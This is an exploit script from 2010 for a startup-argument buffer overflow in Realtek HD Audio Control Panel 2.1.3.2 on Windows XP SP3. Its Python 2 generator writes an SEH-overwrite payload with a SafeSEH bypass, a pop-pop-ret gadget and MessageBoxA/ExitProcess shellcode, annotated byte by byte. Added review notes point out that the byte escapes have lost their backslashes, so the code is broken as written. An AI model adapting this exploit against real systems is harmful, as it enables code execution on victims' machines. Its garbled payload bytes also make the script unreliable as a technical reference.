
# Title : Realtek HD Audio Control Panel 2.1.3.2 Exploit
# Published : 2010-11-14
# Author : BraniX


# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition
# SafeSEH bypass

# The app has a classic buffer overflow vulnerability
# that can be triggered by passing an over-long argument
# as a startup parameter. Shellcode can be run via a classic
# ret overwrite or SEH handler overwrite ... so it's a mini-combo ;)

# Ps. If you need a generic exploit ...
# (no hardcoded VAs), write it yourself ;) or 'donate a few' $$$
# and we will c0de it for You ^^

# Payload generator: writes one binary file whose contents are later handed to
# the target as its over-long startup argument (see header). Every f.write()
# below appends to that file in order, so the statement order IS the payload
# layout -- nothing here may be reordered.
#
# NOTE(review): the byte escapes below appear to have lost their backslashes
# in transit (e.g. 'x5E' where '\x5E' is clearly meant). As written, each such
# literal writes the ASCII characters 'x', '5', 'E' -- not one 0x5E byte -- so
# the file this script actually produces does not match the layout the inline
# comments describe.
# NOTE(review): every address and displacement is hard-coded for the single
# build named in the header (Windows XP SP3, found 2010); a different module
# load address, patch level or ASLR leaves them pointing elsewhere. That
# brittleness is the usual detection/mitigation angle for this class of
# payload rather than anything specific to this script.
# The script is Python 2: print statement, and str objects written to a
# file opened in binary mode (a TypeError on Python 3).
filepath = "C:\ShellCode\RTHDCPL 2.1.3.2 - Exploit.bin"   # "\S" / "\R" are not escapes; Python keeps them literal (warns on 3.12+)
f = open(filepath, "wb")                                   # NOTE(review): never closed if a write raises -- a with-block would cover that

f.write('A'*4)                      # 4 bytes of padding before the handler gadget bytes
f.write('x5E')                     # pop esi   (intended byte 0x5E -- see escape caveat above)
f.write('x5E')                     # pop esi
f.write('xC3')                     # ret
f.write('x90')                     # nop

f.write('[BraniX]')                 # author tag, 8 literal bytes
f.write('A'*448)                    # filler ("mock" in the original) up to the overwritten fields

f.write('xEBx06')                 # jmp +6 : short jump over the next 6 bytes (2 nops + 4-byte address)
f.write('x90')                     # nop
f.write('x90')                     # nop

f.write('x70x01xA5x01')         # pop; pop; ret gadget address, little-endian; hard-coded for the tested build

f.write('x83xC1x0C')             # add ecx, 0Ch
f.write('x88x01')                 # mov byte ptr [ecx], al
f.write('x83xE9x08')             # sub ecx, 08
f.write('x50')                     # push eax
f.write('x51')                     # push ecx
f.write('x51')                     # push ecx
f.write('x50')                     # push eax
f.write('xE8xC5x08x27x7E')     # call user32.MessageBoxA   -- E8 is a relative call; the displacement only works from the fixed location the author assumed

f.write('x50')                     # push eax
f.write('xE8xE7xCBx6Ex7C')     # call kernel32.ExitProcess -- same relative-call / fixed-address assumption

f.write('xCC'*1500)                # 1500 x int 3 (0xCC) trailer; with the mangled escape this is 4500 ASCII bytes instead

f.close()

print "Done ..."                    # Python 2 print statement